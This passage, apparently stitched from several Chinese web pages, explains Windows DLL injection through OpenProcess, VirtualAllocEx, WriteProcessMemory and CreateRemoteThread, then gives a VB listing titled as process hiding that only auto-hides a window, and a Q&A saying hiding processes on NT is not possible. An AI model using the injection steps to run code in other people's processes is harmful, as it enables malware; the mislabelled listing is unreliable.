DWORD dwProcessId // 进程Id
);
这个函数用于修改我们宿主进程的一些属性,这些属性放在第一个参数里面,比如PROCESS_VM_OPERATION就是允许远程VM操作,即允许VirtualProtectEx和WriteProcessMemory函数操作本进程内存空间。PROCESS_CREATE_THREAD 就是允许远程创建线程。PROCESS_VM_WRITE就是允许远程VM写,即允许 WriteProcessMemory函数访问本进程的内存空间。第二个参数是一个标志参数,用来确定返回的句柄是否可以被新的进程继承。我们的程序中设为False。第三个参数需要操作的进程Id,也就是我们的宿主进程的Id。
2.函数VirtualAllocEx(
HANDLE hProcess, //要进行操作的进程句柄,当然是我们的宿主了
LPVOID lpAddress, //分配空间的起始地址
DWORD dwSize, //分配空间的大小
DWORD flAllocationType, // 分配空间的类型
DWORD flProtect // 访问保护类型
);
我们使用 VirtualAllocEx函数在宿主进程中开辟一块内存空间,用于存放dll的文件名。VirtualAllocEx的第1个参数是要操作的进程,第2个是起始地址,第3个是长度,第4,5个是操作参数。其中MEM_COMMIT表示本函数分配的是物理内存或者是内存的页面文件,PAGE_READWRITE表示分配的区域内允许读写。
3.函数WriteProcessMemory (
HANDLE hProcess, //所要操作进程的句柄
LPVOID lpBaseAddress, //开始进行写操作的起始地址
LPVOID lpBuffer, //要写入数据的缓冲区指针
DWORD nSize, // 要写的bytes数
LPDWORD lpNumberOfBytesWritten // 实际写入的bytes数
);
前面在宿主内存中创建好空间后,现在往里面写入dll的名称,而我们的WriteProcessMemory函数就可以胜任这一项工作。WriteProcessMemory函数的第一个参数 是需要往其内存里面写入dd的进程句柄,第二个参数是 “要进行写操作”的目标内存起始地址,第三个参数是 “需要被写入的数据”的地址,第四个参数是准备要写入的长度,第五个参数是实际操作中写的长度,这个参数是被函数输出的。到这里我们就已经能成功把dll的路径名称写进了宿主的内存空间。
第三步,在宿主中启动新的线程
刚才我们已经在宿主程序中创建了一个用于存放一个dll文件路径的缓冲区,现在我们就要让这个dll在宿主的内存空间中运行起来。我们是用LoadLibraryW函数来加载的,而使用LoadLibraryW,又需要知道LoadLibraryW函数的入口地址。所以在加载dll之前,我们要用GetProcAddress来得到LoadLibraryW的入口地址。我们来看看这几个函数的使用方法:
1.GetProcAddress(
HMODULE hModule, //dll模块的句柄
LPCSTR lpProcName // 函数名称
);
我们用这个函数主要想得到kernel32.dll中的函数LoadLibraryW的入口地址,所以
GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW')就可以了,当然有些细节得符合程序编译器的要求,VC下使用就要改成
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW")的形式。
2.CreateRemoteThread (
HANDLE hProcess, //要进行操作的进程句柄,也就是我们的宿主句柄
LPSECURITY_ATTRIBUTES lpThreadAttributes, //线程安全属性的指针
DWORD dwStackSize, //初始栈(stack)的大小
LPTHREAD_START_ROUTINE lpStartAddress,//新建线程函数的指针,或叫做地址
LPVOID lpParameter, //新建线程函数的参数
DWORD dwCreationFlags, //标志位
LPDWORD lpThreadId //线程返回值
);
这个函数就是本文的点睛之笔了,我们之前所做所有的一切,都是在为它做准备工作,它的功能就是在其他任何进程中创建新的线程,让其他的程序或进程附加执行我们的代码。
VB如何能在SP3下隐藏进程的源代码
Option Explicit
Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Private Declare Function GetWindowRect Lib "user32" (ByVal hwnd As Long, lpRect As RECT) As Long
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
' Window rectangle in screen coordinates, filled by GetWindowRect.
Private Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type
' Cursor position in screen coordinates, filled by GetCursorPos.
Private Type POINTAPI
X As Long
Y As Long
End Type
' SetWindowPos insert-after markers and flags. Form_Load uses HWND_TOPMOST, SWP_SHOWWINDOW,
' SWP_NOMOVE and SWP_NOSIZE; HWND_TOP and SWP_NOACTIVATE are not used in the visible code.
' NOTE(review): the "H.." values are presumably hex literals whose prefix was lost in extraction.
Private Const HWND_TOPMOST = -1
Private Const SWP_NOSIZE = H1
Private Const SWP_NOMOVE = H2
Private Const HWND_TOP = 0
Private Const SWP_NOACTIVATE = H10
Private Const SWP_SHOWWINDOW = H40
Private Sub Form_Load()
    ' Keep the form above all other windows without moving or resizing it.
    Dim lFlags As Long
    lFlags = SWP_SHOWWINDOW Or SWP_NOMOVE Or SWP_NOSIZE
    SetWindowPos Me.hwnd, HWND_TOPMOST, 0, 0, 0, 0, lFlags
End Sub
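Private Sub Timer1_Timer()
    ' Auto-hide behaviour for a form docked at a screen edge: while the mouse is over the
    ' form it is slid back into view; when the mouse leaves and the form sits at the top,
    ' left or right edge it is slid off-screen so that only a strip remains visible.
    ' This only moves the window; it does not affect whether the process is listed.
    ' Fix: the extracted listing had lost every "<" and ">" character, which made the
    ' conditions invalid. NOTE(review): the operators below were reconstructed from the
    ' surrounding logic - confirm against the original post.
    Dim p As POINTAPI
    Dim f As RECT

    GetCursorPos p              ' current mouse position
    GetWindowRect Me.hwnd, f    ' current window rectangle

    ' WindowState 1 is minimized; nothing to do in that case.
    If Me.WindowState <> 1 Then
        If p.X > f.Left And p.X < f.Right And p.Y > f.Top And p.Y < f.Bottom Then
            ' Mouse is over the form: bring a hidden form back in from its edge.
            If Me.Top < 0 Then
                Me.Top = -10
                Me.Show
            ElseIf Me.Left < 0 Then
                Me.Left = -10
                Me.Show
            ElseIf Me.Left + Me.Width >= Screen.Width Then
                Me.Left = Screen.Width - Me.Width + 10
                Me.Show
            End If
        Else
            ' Mouse is elsewhere: tuck a form that touches an edge away behind that edge.
            If f.Top <= 4 Then
                Me.Top = 40 - Me.Height
            ElseIf f.Left <= 4 Then
                Me.Left = 40 - Me.Width
            ElseIf Me.Left + Me.Width >= Screen.Width - 4 Then
                Me.Left = Screen.Width - 40
            End If
        End If
    End If
End Sub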
VB隐藏进程的代码是什么?
没用
VB在98下可以用RegisterServiceProcess这个API隐藏自己,可是NT下(2000以后都是NT的,XP也是)没这个函数。App.TaskVisible = False 这句只能让自己的窗口不出现在任务管理器的“应用程序”页里面,进程还是可以看到。基本没找到可以隐藏进程的,死心吧。